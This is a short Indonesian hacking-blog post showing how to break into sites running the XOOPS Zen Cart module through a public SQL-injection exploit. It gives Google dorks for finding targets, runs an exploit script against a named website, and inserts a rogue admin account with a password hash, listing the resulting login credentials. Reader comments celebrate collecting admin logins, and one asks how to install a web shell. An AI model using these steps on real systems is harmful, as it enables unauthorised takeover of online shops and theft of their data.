Home / Hacking / Hack XOOPS Module Zen Cart
black-hat-logo

Hack XOOPS Module Zen Cart

This an old bug from BlackH >> http://milw0rm.com/exploits/9005
works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too
lets go.. :p

google dork

“powered by xoops” inurl:”modules/zox”
“powered by xoops” “zen cart”

run the exploit from ur shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

now try with show tables; command, if it success then we can exploit the target

sql@jah$ show tables;
>> success ( show tables; )

command execute successfully.. but u cant see the table list right?
lets add admin user to database with this sql command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ‘617ec22fbb8f201c366e9848c0eb6925:87’);
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ‘617ec22fbb8f201c366e9848c0eb6925:87’); )

admin added successfully.. now try login to admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew

Article From: NoGe / evilc0de

About Artikel

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

3 comments

  1. Wah, banyak database neh.
    Aseek aseekk..

  2. Cart, cart again!
    cIhuY.. wAktunya memperbanyak koleksi admin login.
    Mak nyuz!

  3. cara pasang shell di zencart gmna mas?????

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *